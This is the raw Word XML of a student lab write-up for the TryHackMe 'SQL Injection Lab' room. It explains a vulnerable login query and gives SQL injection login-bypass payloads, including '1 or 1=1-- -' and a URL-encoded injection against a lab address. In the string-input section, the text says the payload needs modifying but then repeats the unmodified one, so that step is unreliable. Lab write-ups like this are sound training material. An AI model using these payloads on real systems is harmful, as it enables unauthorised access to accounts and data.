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after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:right="-79"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Lab Practical #06:  </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">TryHackMe Room: - </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>SQL Injection Lab</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="17"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="226" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="480" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="242424"/>
          <w:spacing w:val="-1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="242424"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Introduction</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="17"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="226" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="480" w:lineRule="atLeast"/>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="242424"/>
          <w:spacing w:val="-1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="242424"/>
          <w:spacing w:val="-1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">This room is meant as an introduction to SQL injection and demonstrates various SQL injection attacks. </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="17"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="226" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="480" w:lineRule="atLeast"/>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:rStyle w:val="10"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="1155CC"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="222222"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>The web application can be found at: </w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> HYPERLINK "http://10.10.30.46:5000/" \t "_blank" </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="10"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="1155CC"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>http://10.10.30.46:5000</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="10"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="1155CC"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="17"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="226" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="480" w:lineRule="atLeast"/>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:rStyle w:val="10"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="1155CC"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5943600" cy="2672715"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="4143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473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bookmarkEnd w:id="0"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Times New Roman" w:cs="Arial"/>
          <w:color w:val="1155CC"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="single"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="10"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="1155CC"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="17"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="226" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="480" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="242424"/>
          <w:spacing w:val="-1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="242424"/>
          <w:spacing w:val="-1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Introduction to SQL Injection: Part 1</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="17"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="226" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="480" w:lineRule="atLeast"/>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="242424"/>
          <w:spacing w:val="-1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="242424"/>
          <w:spacing w:val="-1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>SQL Injection 1: Input Box Non-String</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="17"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="226" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="480" w:lineRule="atLeast"/>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="242424"/>
          <w:spacing w:val="-1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5943600" cy="2672715"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="438038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38535"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pStyle w:val="17"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="226" w:after="0" w:line="480" w:lineRule="atLeast"/>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:rFonts w:ascii="Ubuntu" w:hAnsi="Ubuntu"/>
          <w:color w:val="212529"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Ubuntu" w:hAnsi="Ubuntu"/>
          <w:color w:val="212529"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>When a user logs in, the application performs the following query:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="17"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="226" w:after="0" w:line="480" w:lineRule="atLeast"/>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:rFonts w:ascii="Ubuntu" w:hAnsi="Ubuntu"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="212529"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Ubuntu" w:hAnsi="Ubuntu"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="212529"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>SELECT uid, name, profileID, salary, passportNr, email, nickName, password FROM usertable WHERE profileID=10 AND password = 'ce5ca67...'</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="17"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="226" w:after="0" w:line="480" w:lineRule="atLeast"/>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:rFonts w:ascii="Ubuntu" w:hAnsi="Ubuntu"/>
          <w:color w:val="212529"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Ubuntu" w:hAnsi="Ubuntu"/>
          <w:color w:val="212529"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Since there is no input sanitization, it is possible to bypass the login by using any True condition such as the one below as the ProfileID</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="17"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="226" w:after="0" w:line="480" w:lineRule="atLeast"/>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:rFonts w:ascii="Ubuntu" w:hAnsi="Ubuntu"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="212529"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Ubuntu" w:hAnsi="Ubuntu" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="212529"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Ubuntu" w:hAnsi="Ubuntu"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="212529"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="17"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="226" w:after="0" w:line="480" w:lineRule="atLeast"/>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:rFonts w:ascii="Ubuntu" w:hAnsi="Ubuntu"/>
          <w:color w:val="212529"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Ubuntu" w:hAnsi="Ubuntu"/>
          <w:color w:val="212529"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>1 or 1=1-- -</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="17"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="226" w:after="0" w:line="480" w:lineRule="atLeast"/>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:rFonts w:ascii="Ubuntu" w:hAnsi="Ubuntu"/>
          <w:color w:val="212529"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5943600" cy="2672715"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1899093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93904"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pStyle w:val="17"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="226" w:after="0" w:line="480" w:lineRule="atLeast"/>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:rFonts w:ascii="Ubuntu" w:hAnsi="Ubuntu"/>
          <w:color w:val="212529"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="17"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="226" w:after="0" w:line="480" w:lineRule="atLeast"/>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:rFonts w:ascii="Ubuntu" w:hAnsi="Ubuntu"/>
          <w:color w:val="212529"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5943600" cy="2672715"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1064150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0817"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pStyle w:val="17"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="226" w:after="0" w:line="480" w:lineRule="atLeast"/>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:rFonts w:ascii="Ubuntu" w:hAnsi="Ubuntu"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="212529"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Ubuntu" w:hAnsi="Ubuntu"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="212529"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>SQL Injection 2: Input Box String</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="17"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="226" w:after="0" w:line="480" w:lineRule="atLeast"/>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:rFonts w:ascii="Ubuntu" w:hAnsi="Ubuntu"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="212529"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5943600" cy="2672715"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="21396989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98959"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pStyle w:val="17"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="226" w:after="0" w:line="480" w:lineRule="atLeast"/>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:rFonts w:ascii="Ubuntu" w:hAnsi="Ubuntu"/>
          <w:color w:val="212529"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Ubuntu" w:hAnsi="Ubuntu"/>
          <w:color w:val="212529"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>This challenge uses the same query as in the previous challenge. However, the parameter expects a string instead of an integer, as can be seen here:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="17"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="226" w:after="0" w:line="480" w:lineRule="atLeast"/>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="242424"/>
          <w:spacing w:val="-1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Ubuntu" w:hAnsi="Ubuntu"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="212529"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>ProfileID=’10’</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="242424"/>
          <w:spacing w:val="-1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="242424"/>
          <w:spacing w:val="-1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="17"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="226" w:after="0" w:line="480" w:lineRule="atLeast"/>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="242424"/>
          <w:spacing w:val="-1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="242424"/>
          <w:spacing w:val="-1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Since it expects a string, we need to modify our payload to bypass the login slightly. The following line will let us in:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="17"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="226" w:after="0" w:line="480" w:lineRule="atLeast"/>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="242424"/>
          <w:spacing w:val="-1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="242424"/>
          <w:spacing w:val="-1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>1 or 1=1-- -</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="17"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="226" w:after="0" w:line="480" w:lineRule="atLeast"/>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="242424"/>
          <w:spacing w:val="-1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5943600" cy="2672715"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="98599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714"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pStyle w:val="17"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="226" w:after="0" w:line="480" w:lineRule="atLeast"/>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="242424"/>
          <w:spacing w:val="-1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5943600" cy="2672715"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="2932236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23643"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pStyle w:val="17"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="226" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="480" w:lineRule="atLeast"/>
        <w:ind w:firstLine="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="242424"/>
          <w:spacing w:val="-1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>SQL Injection 3: URL Injection</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="17"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="226" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="480" w:lineRule="atLeast"/>
        <w:ind w:firstLine="720"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="242424"/>
          <w:spacing w:val="-1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5943600" cy="2672715"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="6122390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39082"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pStyle w:val="17"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="226" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="480" w:lineRule="atLeast"/>
        <w:ind w:firstLine="720"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="242424"/>
          <w:spacing w:val="-1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="17"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="226" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="480" w:lineRule="atLeast"/>
        <w:ind w:firstLine="720"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="242424"/>
          <w:spacing w:val="-1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="242424"/>
          <w:spacing w:val="-1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Here, the SQL query is the same as the previous one, But in this case, the malicious user input cannot be injected directly into the application via the login form because some client-side controls have been implemented</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:color w:val="242424"/>
          <w:spacing w:val="-1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:color w:val="242424"/>
          <w:spacing w:val="-1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:color w:val="242424"/>
          <w:spacing w:val="-1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>The browser will automatically urlencode this for us. Urlencoding is needed since the HTTP protocol does not support all characters in the request. When urlencoded, the URL looks as follows:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
          <w:color w:val="242424"/>
          <w:spacing w:val="-1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> HYPERLINK "http://10.10.30.46:5000/sesqli3/login?profileID=-1%27%20or%201=1--%20-&amp;password=a" </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="10"/>
          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
          <w:spacing w:val="-1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>http://10.10.30.46:5000/sesqli3/login?profileID=-1%27%20or%201=1--%20-&amp;password=a</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="10"/>
          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
          <w:spacing w:val="-1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="720"/>
        <w:rPr>
